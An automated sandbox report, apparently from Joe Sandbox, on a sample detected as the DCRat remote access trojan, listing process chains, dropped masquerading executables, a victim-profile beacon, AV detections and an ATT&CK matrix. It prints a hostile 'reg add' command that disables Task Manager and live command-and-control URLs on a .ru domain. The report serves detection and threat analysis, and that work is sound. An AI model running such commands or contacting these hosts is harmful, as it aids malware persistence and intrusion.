Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595101	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594888	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594526	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 594175	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: driverDhcp.exe, 00000005.00000002.2058669515.000000001C093000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: Mj6WEKda85.exe, 00000000.00000003.2000145461.0000000002D82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
Source: wscript.exe, 00000002.00000002.2035268570.000000000335F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000016.00000002.2108200850.0000027BF0B98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: wscript.exe, 00000002.00000002.2035268570.000000000335F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&
Source: driverDhcp.exe, 00000005.00000002.2058871393.000000001C530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4467928836.000000001C1E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

API call chain: ExitProcess graph end node

graph_0-23742

Source: C:\savesbrokerCrt\driverDhcp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0088866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0088866F

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0088753D mov eax, dword ptr fs:[00000030h]

0_2_0088753D

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0088B710 GetProcessHeap,

0_2_0088B710

Source: C:\savesbrokerCrt\driverDhcp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Process token adjusted: Debug
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087F063 SetUnhandledExceptionFilter,	0_2_0087F063
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0087F22B
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0088866F
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0087EF05

Source: C:\savesbrokerCrt\driverDhcp.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\savesbrokerCrt\driverDhcp.exe "C:\savesbrokerCrt\driverDhcp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\RuntimeBroker.exe "C:\Users\Default\Pictures\RuntimeBroker.exe"	Jump to behavior

Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"376483","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"376483","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}Pm1
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: erica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"376483","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"376483","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}s":[{"urPm1

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0087ED5B cpuid

0_2_0087ED5B

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0087A63C

Source: C:\savesbrokerCrt\driverDhcp.exe	Queries volume information: C:\savesbrokerCrt\driverDhcp.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Queries volume information: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Queries volume information: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe VolumeInformation
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Queries volume information: C:\Users\Default\Pictures\RuntimeBroker.exe VolumeInformation

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0087D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0087D5D4

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0086ACF5 GetVersionExW,

0_2_0086ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: DisableTaskMgr 1

Disables the Windows task manager (taskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2057566472.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2194108446.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2194108446.00000000024B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2148349997.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2148349997.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2057566472.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driverDhcp.exe PID: 1520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 3992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003674000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000037F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2057566472.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2194108446.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2194108446.00000000024B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2148349997.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2148349997.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2057566472.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driverDhcp.exe PID: 1520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 3992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003674000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000374F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000037F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	122 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Modify Registry	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	131 Virtualization/Sandbox Evasion	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	137 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Mj6WEKda85.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
Mj6WEKda85.exe	100%	Avira	VBS/Runner.VPG
Mj6WEKda85.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat	100%	Avira	BAT/Delbat.C
C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe	100%	Avira	VBS/Runner.VPG
C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	100%	Avira	HEUR/AGEN.1323984
C:\savesbrokerCrt\driverDhcp.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\Default\Pictures\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	100%	Joe Sandbox ML
C:\savesbrokerCrt\driverDhcp.exe	100%	Joe Sandbox ML
C:\Users\Default\Pictures\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\Pictures\RuntimeBroker.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\savesbrokerCrt\driverDhcp.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://52952cm.darkproducts.ru/@==gbJBzYuFDT	0%	Avira URL Cloud	safe
http://52952cm.darkproducts.ru/L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ	100%	Avira URL Cloud	malware
http://52952cm.darkproducts.ruPm1	0%	Avira URL Cloud	safe
http://52952cm.darkproX	0%	Avira URL Cloud	safe
http://52952cm.darkproducts.ru/	0%	Avira URL Cloud	safe
http://52952cm.darkproXz	0%	Avira URL Cloud	safe
http://52952cm.darkproducts.ru/L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv7	100%	Avira URL Cloud	malware
http://52952cm.darkproducts.ru	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
52952cm.darkproducts.ru	104.21.12.142	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://52952cm.darkproducts.ru/@==gbJBzYuFDT	true	Avira URL Cloud: safe	unknown
